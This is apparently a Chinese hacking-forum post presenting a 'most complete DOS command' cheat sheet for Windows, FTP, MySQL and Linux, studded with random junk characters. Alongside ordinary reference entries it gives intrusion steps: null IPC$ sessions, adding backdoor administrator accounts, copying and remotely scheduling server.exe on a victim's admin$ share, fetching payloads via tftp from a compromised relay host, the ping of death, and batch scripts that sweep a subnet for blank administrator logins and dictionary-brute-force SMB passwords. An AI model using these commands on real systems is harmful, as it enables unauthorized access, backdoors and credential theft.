黑客基础--最全的DOS命令 黑客基础, 最全的, DOS命令

admin

net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] " " /user:" " 建立IPC空链接 9 P( A) U* [. g& K
net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] "密码" /user:"用户名" 建立IPC非空链接 * b/ E% z" V  S/ F7 @% F
net use h: [url=file://\\ip\c$]\\ip\c$[/url] "密码" /user:"用户名" 直接登陆后映射对方C：到本地为H:
8 ], _5 c- K2 {8 ynet use h: [url=file://\\ip\c$]\\ip\c$[/url] 登陆后映射对方C：到本地为H: 0 }8 j# J3 o) `) ?
net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] /del 删除IPC链接 ) c( q+ k1 R  N2 ?2 l
net use h: /del 删除映射对方到本地的为H:的映射 : W$ W. @- X' I
net user 用户名　密码　/add 建立用户 $ k/ |3 B! @$ X+ w
net user guest /active:yes 激活guest用户 % v7 U  f3 t" {0 j
net user 查看有哪些用户
8 F4 ]1 V8 m9 d; }net user 帐户名 查看帐户的属性
# ]  a+ i7 q4 E9 m& xnet localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意：administrator后加s用复数 3 q+ M* c5 U3 f7 G# p4 i- u/ o/ y! o
net start 查看开启了哪些服务
4 U/ O7 \0 G1 K  z6 G! @% {, b: P5 c6 Xnet start 服务名　 开启服务；(如:net start telnet， net start schedule) & l: @4 `% I7 S+ S: s
net stop 服务名 停止某服务
% d  g6 o  F4 N( anet time \\目标ip 查看对方时间 & G2 q5 ]0 ?# z
net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息
* S0 T8 I5 O" v! wnet view 查看本地局域网内开启了哪些共享 1 ^# S3 ~$ n1 f0 U) G0 v( B, w
net view [url=file://\\ip]\\ip[/url] 查看对方局域网内开启了哪些共享 ! f# I5 @  h) C' ]! z& L  L
net config 显示系统网络设置
* W- t0 U* L) O, Jnet logoff 断开连接的共享 ; e. `0 Z. n, V( F) w* U/ u7 T
net pause 服务名 暂停某服务
. R# ^6 u2 o( v+ Hnet send ip "文本信息" 向对方发信息 $ n; N, T5 S' Y) q
net ver 局域网内正在使用的网络连接类型和信息 8 c* ]' x$ N" A% [% a& W& Y$ I8 h
net share 查看本地开启的共享
* [( e* Z" R0 z" Y, \* \. {. Qnet share ipc$ 开启ipc$共享
5 L9 S2 T9 t8 w/ A, ]9 f( V$ c( Bnet share ipc$ /del 删除ipc$共享 1 Y) {5 `6 x; l& Z0 F0 n
net share c$ /del 删除C：共享
- B0 K. M! _; b& W# h% M8 J) nnet user guest 12345 用guest用户登陆后用将密码改为12345 . I" O( g- o8 q$ @1 v
net password 密码 更改系统登陆密码
% v* e1 z2 N% [2 u' J' X& u( \netstat -a 查看开启了哪些端口,常用netstat -an * R) i+ }( }+ s, d6 e5 d7 z% j
netstat -n 查看端口的网络连接情况，常用netstat -an
. T# ?8 i1 m% @3 z1 V* _$ t- |netstat -v 查看正在进行的工作
1 k$ G4 C) w( h- cnetstat -p 协议名 例：netstat -p tcq/ip 查看某协议使用情况（查看tcp/ip协议使用情况）
, e: d% B. [7 @3 u1 qnetstat -s 查看正在使用的所有协议使用情况 7 b& F) t0 u$ R5 ^! A
nbtstat -A ip 对方136到139其中一个端口开了的话，就可查看对方最近登陆的用户名（03前的为用户名）-注意：参数-A要大写 + i1 V; x( y) L- ?0 m" Z
tracert -参数 ip(或计算机名) 跟踪路由（数据包），参数：“-w数字”用于设置超时间隔。 2 R# f1 [# o, [7 v  N4 P
ping ip(或域名) 向对方主机发送默认大小为32字节的数据，参数：“-l[空格]数据包大小”；“-n发送数据次数”；“-t”指一直ping。
' ?' z1 {: P. B1 f0 ^4 ^8 V3 Nping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping) ( G5 M5 s& h3 J
ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用参数“/all”显示全部配置信息
8 Y6 U1 s" k# ^) T* g% t1 dtlist -t 以树行列表显示进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)
: o7 r  S* w! X  Zkill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内) ) z" N2 N' A: I
del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件，/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件，“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件
+ i2 Z6 v. j/ E' ndel /S /Q 目录 或用：rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。（二个命令作用相同）
! l% H3 w' p, n  r9 A# t- @$ pmove 盘符\路径\要移动的文件名　存放移动文件的路径\移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖
. s' O! }/ H9 o. pfc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中，"> "和"> >" 是重定向命令
" a$ B8 P0 X( T) [# ]9 d  L0 Hat id号 开启已php?name=%D7%A2%B2%E1"  class="t_tag">注册的某个计划任务
6 r  v: Z; q0 R; A) v9 J0 qat /delete 停止所有计划任务，用参数/yes则不需要确认就直接停止 ( r* v. G. T, ^1 Q
at id号 /delete 停止某个已注册的计划任务
; m; z5 {% U8 n- Q3 P: F, X  ?at 查看所有的计划任务 / {! L6 s; f+ Y9 \' P
at [url=file://\\ip]\\ip[/url] time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机 2 X1 O6 J/ {5 y4 h# Y. J
finger username @host 查看最近有哪些用户登陆 3 ]7 H: Y  Z  `
telnet ip 端口 远和登陆服务器,默认端口为23 3 \& Q7 Q7 \' z: a! q
open ip 连接到IP（属telnet登陆后的命令） 0 f$ [5 c) ]. I0 n
telnet 在本机上直接键入telnet 将进入本机的telnet - i; O, ?* O# s+ u3 X
copy 路径\文件名1　路径\文件名2 /y 复制文件1到指定的目录为文件2，用参数/y就同时取消确认你要改写一份现存目录文件
4 o$ ~1 Z) ^& L6 `& t; xcopy c:\srv.exe [url=file://\\ip\admin$]\\ip\admin$[/url] 复制本地c:\srv.exe到对方的admin下 7 w. ]: [5 L$ U: e7 Z
cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件，注：2st.txt文件头要空三排，参数：/b指二进制文件，/a指ASCLL格式文件 9 g7 ~& W/ n2 o
copy [url=file://\\ip\admin$\svv.exe]\\ip\admin$\svv.exe[/url] c:\ 或:copy\\ip\admin$\*.* 复制对方admini$共享下的srv.exe文件（所有文件）至本地C： : R! i* P9 b. j7 |4 E
xcopy 要复制的文件或目录树　目标地址\目录名 复制文件和目录树，用参数/Y将不提示覆盖相同文件
6 J, T- F$ Z# T: C. K. i8 v: gtftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后，将“IP”的server.exe下载到目标主机c:\server.exe 参数：-i指以二进制模式传送，如传送exe文件时用，如不加-i 则以ASCII模式（传送文本文件模式）进行传送 1 {  f4 X' [, G  X; {
tftp -i 对方IP　put c:\server.exe 登陆后，上传本地c:\server.exe至主机 ( E9 A' O! |$ g' r0 ^  ?$ P
ftp ip 端口 用于上传文件至服务器或进行文件操作，默认端口为21。bin指用二进制方式传送（可执行文件进）；默认为ASCII格式传送(文本文件时)
4 }9 t! `: u2 a& I* X" u- ~' zroute print 显示出IP路由，将主要显示网络地址Network addres，子网掩码Netmask，网关地址Gateway addres，接口地址Interface ; _3 H' ~3 B$ P" B2 W
arp 查看和处理ARP缓存，ARP是名字解析的意思，负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息
. U) Y0 U! {6 R8 estart 程序名或命令 /max 或/min 新开一个新窗口并最大化（最小化）运行某程序或命令
0 {: J0 q9 z( K) a( S) K, E% ^, Cmem 查看cpu使用情况 2 g7 L, ^# ~$ o, @* {0 J# l$ n+ T4 [; u
attrib 文件名(目录名) 查看某文件（目录）的属性
2 Q7 j+ t1 }# o% W3 E# Y2 K* qattrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档，只读，系统，隐藏 属性；用＋则是添加为某属性 ' O6 H( B( t$ j1 J; Q  q9 A% M& i
dir 查看文件，参数：/Q显示文件及目录属系统哪个用户，/T:C显示文件创建时间，/T:A显示文件上次被访问时间，/T:W上次被修改时间 5 U* a9 P+ X& y  C! X8 o
date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间，而不必输入新日期和时间 6 c% c& q9 I1 Z& v8 V. y' n) p' h  [
set 指定环境变量名称=要指派给变量的字符 设置环境变量
/ [6 |5 }; U5 \set 显示当前所有的环境变量 ) p% j4 o# e$ K* U& t* F; G- k) _
set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量 3 y; j# h5 {& R- w, D1 s( {
pause 暂停批处理程序，并显示出：请按任意键继续....
* @6 ]  O. c5 Lif 在批处理程序中执行条件处理（更多说明见if命令及变量）
9 ^+ q$ {- J; t, f6 I8 Cgoto 标签 将cmd.exe导向到批处理程序中带标签的行（标签必须单独一行，且以冒号打头，例如：“：start”标签）
/ B9 c! p* V/ Vcall 路径\批处理文件名 从批处理程序中调用另一个批处理程序 （更多说明见call /?）
. u' O) j& v5 Nfor 对一组文件中的每一个文件执行某个特定命令（更多说明见for命令及变量） 3 n& i" H3 b  R- _% P2 m
echo on或off 打开或关闭echo，仅用echo不加参数则显示当前echo设置
$ S2 P3 p4 I8 A. E1 g6 Becho 信息 在屏幕上显示出信息 $ h% d; {/ u" m. V
echo 信息 >> pass.txt 将"信息"保存到pass.txt文件中 ' [5 z! Q, R" V# C. i8 O: R
findstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello 6 T4 y6 b! B- c
find 文件名 查找某文件
% p+ w3 f, a2 B8 ^3 [, w- m+ O/ T/ qtitle 标题名字 更改CMD窗口标题名字 , Y3 o2 s# q' U
color 颜色值 设置cmd控制台前景和背景颜色；0＝黑、1＝蓝、2＝绿、3＝浅绿、4＝红、5＝紫、6＝黄、7=白、8=灰、9=淡蓝、A＝淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白
( I9 {: Z' M% |; d$ P+ ^3 h5 ~; Dprompt 名称 更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为：EntSky\ ) ' K( l) q) s  u$ Y% q6 q" q5 Z. l
print 文件名 打印文本文件
0 p0 t" w& q6 w  c; u; y- V, {; M$ Kver 在DOS窗口下显示版本信息 ' f: m: U5 w% i9 e
winver 弹出一个窗口显示版本信息（内存大小、系统版本、补丁版本、计算机名） 1 q' R: H, w& z( R. v% [& l
format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例：Format D: /FS:NTFS
' g' O) i6 k2 \* D9 F  g- Hmd　目录名 创建目录 % g" B. b+ h' @. X8 v
replace 源文件　要替换文件的目录 替换文件 $ D- s! u$ @  o2 `$ f, y7 U
ren 原文件名　新文件名 重命名文件名
9 J) b" j, d1 n1 mtree 以树形结构显示出目录，用参数-f 将列出第个文件夹中文件名称   k5 K/ _) O9 R/ F) G
type 文件名 显示文本文件的内容
& H2 f6 A" N+ vmore 文件名 逐屏显示输出文件 7 O. E/ Q& n4 h2 t7 c+ S$ h
doskey 要锁定的命令＝字符
" [% P. y, L  J! Cdoskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行，重新调用win2k命令，并创建宏)。如：锁定dir命令：doskey dir=entsky (不能用doskey dir=dir)；解锁：doskey dir=
" ~+ B1 \/ n# G1 Ftaskmgr 调出任务管理器
( Y9 D3 j, ^* j9 zchkdsk /F D: 检查磁盘D并显示状态报告；加参数/f并修复磁盘上的错误
+ S6 E. d, Y/ [; utlntadmn telnt服务admn,键入tlntadmn选择3，再选择8,就可以更改telnet服务默认端口23为其它任何端口 ) v7 ?/ ^6 K( h8 V
exit 退出cmd.exe程序或目前，用参数/B则是退出当前批处理脚本而不是cmd.exe : u* e  T+ v- X, ?6 f) v
path 路径\可执行文件的文件名 为可执行文件设置一个路径。 + E+ q3 e0 N4 P0 V$ `
cmd 启动一个win2K命令解释窗口。参数：/eff、/en 关闭、开启命令扩展；更我详细说明见cmd /? ' b  O* H$ D6 x$ U8 S* v$ k( M3 S
regedit /s 注册表文件名 导入注册表；参数/S指安静模式导入，无任何提示； 9 D2 |: t  L9 L" q5 W5 p
regedit /e 注册表文件名 导出注册表
! Z4 z3 S+ U3 J! r4 K. Kcacls 文件名　参数 显示或修改文件访问控制列表（ACL）——针对NTFS格式时。参数：/D 用户名:设定拒绝某用户访问；/P 用户名:perm 替换指定用户的访问权限；/G 用户名:perm 赋予指定用户访问权限；Perm 可以是: N 无，R 读取， W 写入， C 更改(写入)，F 完全控制；例：cacls D:\test.txt /D pub 设定d:\test.txt拒绝pub用户访问。
! D2 @3 }% U5 m# \- i& m6 o0 K2 ?( jcacls 文件名 查看文件的访问用户权限列表
0 Z3 _& O3 K* |) q6 K* Y" k! jREM 文本内容 在批处理文件中添加注解 ' x6 `8 J3 J* E; n# W/ B
netsh 查看或更改本地网络配置情况2 V$ N" N: ~2 ^9 d* j* F( K6 s
IIS服务命令：& L/ @4 q7 ?; P+ x
iisreset /reboot 重启win2k计算机（但有提示系统将重启信息出现）
- j! U+ l5 u) A- {' aiisreset /start或stop 启动（停止）所有Internet服务 % T  S% }' B7 n2 f4 K* t$ \
iisreset /restart 停止然后重新启动所有Internet服务 8 r' l- A# ^8 _. m  t/ W, |
iisreset /status 显示所有Internet服务状态
+ @8 `3 j( \. u4 B* {iisreset /enable或disable 在本地系统上启用（禁用）Internet服务的重新启动
% K, f8 h! H4 Z0 [. Hiisreset /rebootonerror 当启动、停止或重新启动Internet服务时，若发生错误将重新开机
) S& b0 t, r  }1 F- `iisreset /noforce 若无法停止Internet服务，将不会强制终止Internet服务
3 Q+ V, {. v! d5 viisreset /timeout Val在到达逾时间（秒）时，仍未停止Internet服务，若指定/rebootonerror参数，则电脑将会重新开机。预设值为重新启动20秒，停止60秒，重新开机0秒。
  b2 U% I2 Q  E7 Z1 D5 j4 uFTP 命令： (后面有详细说明内容)
9 v6 m( k  R9 s/ O5 p0 z0 rftp的命令行格式为:
. l& C/ k) W2 a$ ^  G) ~4 bftp －v －d －i －n －g[主机名] －v 显示远程服务器的所有响应信息。# m3 ~6 e2 z& G: H
－d 使用调试方式。
4 b: ~+ F. I6 R; B/ n3 Z" g－n 限制ftp的自动登录,即不使用.netrc文件。
% ~! F- u& _6 n' k－g 取消全局文件名。 ! N3 d% j6 }- }
help [命令] 或 ？[命令] 查看命令说明
$ ~: V0 w9 \6 ]# N' O$ h1 ibye 或 quit 终止主机FTP进程,并退出FTP管理方式.
$ u' E6 }( `0 K1 B, a. npwd 列出当前远端主机目录 ! {! T' R) _8 k, r7 x) ]
put 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中
: b, W2 f3 v5 l+ o3 Zget 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中 " g* I1 C  V; z! b/ B
mget [remote-files] 从远端主机接收一批文件至本地主机 : ^6 I  s; A( R+ v1 T1 L
mput local-files 将本地主机中一批文件传送至远端主机 # J7 C8 |, H1 F& x; L
dir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件
9 T# {0 x) K/ }. xascii 设定以ASCII方式传送文件(缺省值) $ J6 \  I: H4 ]5 B
bin 或 image 设定以二进制方式传送文件 2 h, e) K0 O" q2 E: d
bell 每完成一次文件传送,报警提示 5 o; c! N3 E8 q; `! t6 q( B/ d
cdup 返回上一级目录 1 m0 v5 \! U( f" \
close 中断与远程服务器的ftp会话(与open对应)
4 _' p& |! ?$ [' \4 Eopen host[port] 建立指定ftp服务器连接,可指定连接端口
- W  s7 p' `( v7 j8 Tdelete 删除远端主机中的文件 ' ^- {) q9 d2 w4 p. }
mdelete [remote-files] 删除一批文件 - F" E& {/ R" d0 G8 B2 t
mkdir directory-name 在远端主机中建立目录 : y$ N. ~8 L1 _, a/ o
rename [from] [to] 改变远端主机中的文件名
- U4 y7 T( L' M9 H. O: F1 h1 Xrmdir directory-name 删除远端主机中的目录
* x8 y9 Q3 l: s3 ~5 ]: Qstatus 显示当前FTP的状态
3 ]. `& f2 c7 V7 C% B# n) c8 O- Jsystem 显示远端主机系统类型 ( U$ U5 ^# f; {9 b
user user-name [password] [account] 重新以别的用户名登录远端主机 ! i2 b! i6 u5 s- j" p7 ^! V* v7 B
open host [port] 重新建立一个新的连接 ; z* e8 N$ N$ r, ?; Z
prompt 交互提示模式 ( d% O6 ?, ?2 ~5 E* S
macdef 定义宏命令
% E" }  b6 D. R6 z: c" Ylcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录
# L1 e/ _* ]4 |+ }chmod 改变远端主机的文件权限 ' b' Q; y: @8 N! c7 I
case 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母
. E% ~+ ]. Z4 X1 d. Xcd remote－dir 进入远程主机目录
- \4 E. q& j3 }3 O0 x" Wcdup 进入远程主机目录的父目录
4 T  j+ k! y. [  p! 在本地机中执行交互shell，exit回到ftp环境,如!ls＊.zip
7 K+ U. z2 k9 Q) I# TMYSQL 命令： , C5 f" w+ D- a) @. T6 M
mysql -h主机地址 -u用户名 －p密码 连接MYSQL;如果刚安装好MYSQL，超级用户root是没有密码的。9 p4 A9 K* E9 q1 r8 j1 y
（例：mysql -h110.110.110.110 -Uroot -P123456 " D+ J6 S- B1 e: `% O
注:u与root可以不用加空格，其它也一样）
. N4 W$ J( M; o. W: o$ nexit 退出MYSQL
8 O! m- G: |2 g3 l) H! zmysqladmin -u用户名 -p旧密码 password 新密码 修改密码 " @, O% l+ [2 {+ X" W. x1 @
grant select on 数据库.* to 用户名@登录主机 identified by \"密码\"; 增加新用户。（注意：和上面不同，下面的因为是MYSQL环境中的命令，所以后面都带一个分号作为命令结束符） 8 \6 v$ `; B3 B% }
show databases; 显示数据库列表。刚开始时才两个数据库：mysql和test。mysql库很重要它里面有MYSQL的系统信息，我们改密码和新增用户，实际上就是用这个库进行操作。 " B( V+ X7 n2 ~& j$ y4 U+ t
use mysql；$ J: d$ f  S+ M5 p
show tables; 显示库中的数据表
% \4 b& B* m& v0 N6 R8 o' zdescribe 表名; 显示数据表的结构
* t% R$ ?! w' A- _, Rcreate database 库名; 建库
. S/ a  p+ b! [6 |! Iuse 库名；
7 O, X* m. {6 R3 n( @' ~  k! Ycreate table 表名 (字段设定列表)； 建表 ( f) ]9 g, r, z' ]' n
drop database 库名; 8 K) D, l- R- ^, b
drop table 表名； 删库和删表 3 c' x& r* K4 [2 w; R) m" C
delete from 表名; 将表中记录清空
' }5 |7 S2 N3 t5 {0 w; H2 K- p; {select * from 表名; 显示表中的记录
- r4 T8 B: J; _" x' Q. U# Nmysqldump --opt school>school.bbb 备份数据库：（命令在DOS的[url=file://\\mysql\\bin]\\mysql\\bin[/url]目录下执行）;注释:将数据库school备份到school.bbb文件，school.bbb是一个文本文件，文件名任取，打开看看你会有新发现。
4 i3 Y. g, `: q# n( rwin2003系统下新增命令（实用部份）： 5 q9 q) P4 Z8 A: l2 [# _0 i3 h
shutdown /参数 关闭或重启本地或远程主机。
* K  ^* R- _) E+ R: q9 y参数说明：/S 关闭主机，/R 重启主机， /T 数字 设定延时的时间，范围0～180秒之间， /A取消开机，/M //IP 指定的远程主机。
* L3 I7 E# G6 D9 E* w( P6 F' o例：shutdown /r /t 0 立即重启本地主机（无延时） # P- q( D+ f" d+ L' x* m
taskill /参数 进程名或进程的pid 终止一个或多个任务和进程。  s: Z, z6 H2 E% N' v
参数说明：/PID 要终止进程的pid,可用tasklist命令获得各进程的pid，/IM 要终止的进程的进程名，/F 强制终止进程，/T 终止指定的进程及他所启动的子进程。 & Q' ^$ a+ i' L$ V$ Y
tasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。7 F& _, O4 f) g! E+ a+ [
参数说明：/M 列出当前进程加载的dll文件，/SVC 显示出每个进程对应的服务，无参数时就只列出当前的进程3 K8 F0 h9 @2 f$ t; v
Linux系统下基本命令： 要区分大小写
5 E3 o9 o7 M. v. o1 d, F) Ouname 显示版本信息（同win2K的 ver） 9 n7 \; M- r  Y- B. @" r
dir 显示当前目录文件,ls -al 显示包括隐藏文件（同win2K的 dir）
* r+ W- }+ r/ D& l. Z3 Q6 Rpwd 查询当前所在的目录位置 * M; F& z6 A! b6 `/ C
cd cd　..回到上一层目录，注意cd 与..之间有空格。cd　/返回到根目录。
- r7 T) r: i% X9 a5 Zcat 文件名 查看文件内容 & k- R/ j5 L* D
cat >abc.txt 往abc.txt文件中写上内容。 + y& C5 R* ]! t; q' O! U' K
more 文件名 以一页一页的方式显示一个文本文件。
8 u. u' i( ]- _cp 复制文件 ( ^) f) p/ @) {! T9 M
mv 移动文件 5 W1 j; I* m& d9 f3 g' J
rm 文件名 删除文件，rm -a 目录名删除目录及子目录
% T. c# [8 M- w& E* F7 P9 o7 _mkdir 目录名 建立目录
1 u5 u! c8 @9 c8 Crmdir 删除子目录，目录内没有文档。
4 v' K4 M1 T+ V4 H2 T( o& _, `9 t) ^chmod 设定档案或目录的存取权限
9 ?& ]) \9 c) f: G$ h! R3 r1 fgrep 在档案中查找字符串
! u$ z6 {7 M9 Tdiff 档案文件比较 % G" L/ s6 d+ G) m
find 档案搜寻
% [  L- c5 w' J8 @; @7 F9 zdate 现在的日期、时间 - c* s) j: D0 |. F) @6 Q1 L" `2 X
who 查询目前和你使用同一台机器的人以及Login时间地点
4 M2 B2 h1 e6 j3 K$ X9 fw 查询目前上机者的详细资料
$ _# ]/ [6 \8 P% }' Vwhoami 查看自己的帐号名称
1 I0 }! m$ u  B* Jgroups 查看某人的Group 0 r3 _9 M2 [8 M3 z3 \- m
passwd 更改密码
2 U* h* ?4 I8 Z, S4 ihistory 查看自己下过的命令 ; N) l; t  t! R6 g* w
ps 显示进程状态
. q9 d$ ]: y4 R+ T6 Pkill 停止某进程
1 p2 C5 \+ t9 |3 h5 _gcc 黑客通常用它来编译C语言写的文件
; A, G4 Z+ A0 P' Dsu 权限转换为指定使用者 7 a- F' O/ i2 K$ u) @# z: c
telnet IP telnet连接对方主机（同win2K），当出现bash$时就说明连接成功。
  |  O5 b; y) F# D9 L1 y; [3 V' wftp ftp连接上某服务器（同win2K
1 T3 {! j3 {, }8 I0 V. V  @1 T' U+ Y附：批处理命令与变量
0 [$ K1 m1 n+ v) @7 A  h/ Y1：for命令及变量 基本格式： 7 q) i8 C! ?6 z+ O9 P$ `
FOR /参数 %variable IN (set) DO command [command_parameters] %variable:指定一个单一字母可替换的参数，如：%i ，而指定一个变量则用：%%i ，而调用变量时用：%i% ，变量是区分大小写的（%i 不等于 %I）。: D% S2 ^; u8 X2 D, i
批处理每次能处理的变量从%0—%9共10个，其中%0默认给批处理文件名使用，%1默认为使用此批处理时输入的的第一个值，同理：%2—%9指输入的第2-9个值；例：net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] pass /user:user 中ip为%1,pass为%2 ,user为%3
3 K. ?4 _2 t' I; I9 H3 i- R(set):指定一个或一组文件，可使用通配符，如：(D:\user.txt)和(1 1 254)(1 -1 254),{“(1 1 254)”第一个"1"指起始值，第二个"1"指增长量，第三个"254"指结束值，即：从1到254；“(1 -1 254)”说明：即从254到1}
4 K$ l1 D; r- u5 s8 rcommand：指定对第个文件执行的命令，如：net use命令；如要执行多个命令时，命令这间加：& 来隔开( @6 ~) Y8 x4 l/ z0 }! T
command_parameters：为特定命令指定参数或命令行开关
" O( y9 L) M4 l9 H" m2 w% y6 {IN (set)：指在(set)中取值；DO command ：指执行command
7 |3 h* T- f- c+ U' b, e1 G! j! ]2 i, r' p参数：/L 指用增量形式{(set)为增量形式时}；/F 指从文件中不断取值，直到取完为止{(set)为文件时，如(d:\pass.txt)时}。
- S' g% ?/ N  I* W9 r1 X) s3 F" C; F用法举例：
# t, w, l5 M7 g" M* b9 g( P& a% f@echo off 8 d( g5 c* k- Q! O5 M0 A' H; E) G/ V
echo 用法格式：test.bat *.*.* > test.txt ! l8 u, u0 Z! X# \* ?) ~
for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use [url=file://\\%1.%%G]\\%1.%%G[/url] /user:administrator | find "命令成功完成" >>test.txt $ {/ a5 h) F8 n) X5 G0 |. o% n
存为test.bat 说明：对指定的一个C类网段的254个IP依次试建立administrator密码为空的IPC$连接，如果成功就把该IP存在test.txt中。2 q( Y" O6 T  S) S, v1 X: w
/L指用增量形式（即从1-254或254-1）；输入的IP前面三位：*.*.*为批处理默认的 %1；%%G 为变量(ip的最后一位）；& 用来隔开echo 和net use 这二个命令；| 指建立了ipc$后，在结果中用find查看是否有"命令成功完成"信息；%1.%%G 为完整的IP地址；(1 1 254) 指起始值，增长量，结止值。 ! @& J# n" A# D8 ?, F7 E: z
@echo off
2 V# ~9 L# N" g% @+ g9 mecho 用法格式：ok.bat ip . J: P9 Z) O- A! K) F& ^
FOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200
  {/ t! q6 h' z/ l' Q& X; |0 U存为：ok.exe 说明：输入一个IP后，用字典文件d:\pass.dic来暴解d:\user.dic中的用户密码，直到文件中值取完为止。%%i为用户名；%1为输入的IP地址（默认）。* t4 y+ @) P# d9 K, G% E8 n
2：if命令及变量 基本格式： ' j. _6 t3 M- d, q9 r
IF [not] errorlevel 数字 命令语句 如果程序运行最后返回一个等于或大于指定数字的退出编码，指定条件为“真”。
+ ?) ^# `0 T1 r7 s6 C& m7 ?' g例：IF errorlevel 0 命令 指程序执行后返回的值为0时，就值行后面的命令；IF not errorlevel 1 命令指程序执行最后返回的值不等于1，就执行后面的命令。
& W( f) E3 w' e6 _) ]3 K7 }9 Z0 指发现并成功执行（真）；1 指没有发现、没执行（假）。
, ?6 F' @* x4 LIF [not] 字符串1==字符串2 命令语句 如果指定的文本字符串匹配（即：字符串1 等于 字符串2），就执行后面的命令。* G& k5 e2 Z. Q! A2 K
例：“if "%2%"=="4" goto start”指：如果输入的第二个变量为4时，执行后面的命令（注意：调用变量时就%变量名%并加" "） ( l5 l# l% o6 G
IF [not] exist 文件名 命令语句 如果指定的文件名存在，就执行后面的命令。! D# G' Z, G; \: n9 J; A
例：“if not nc.exe goto end”指：如果没有发现nc.exe文件就跳到":end"标签处。
$ q& A/ F/ V1 C  V, _8 w! ]3 cIF [not] errorlevel 数字 命令语句 else 命令语句或 IF [not] 字符串1==字符串2 命令语句 else 命令语句或 IF [not] exist 文件名 命令语句 else 命令语句 加上：else 命令语句后指：当前面的条件不成立时，就指行else后面的命令。注意：else 必须与 if 在同一行才有效。 当有del命令时需把del命令全部内容用< >括起来，因为del命令要单独一行时才能执行，用上< >后就等于是单独一行了；例如：“if exist test.txt. <del test.txt.> else echo test.txt.missing ”，注意命令中的“.”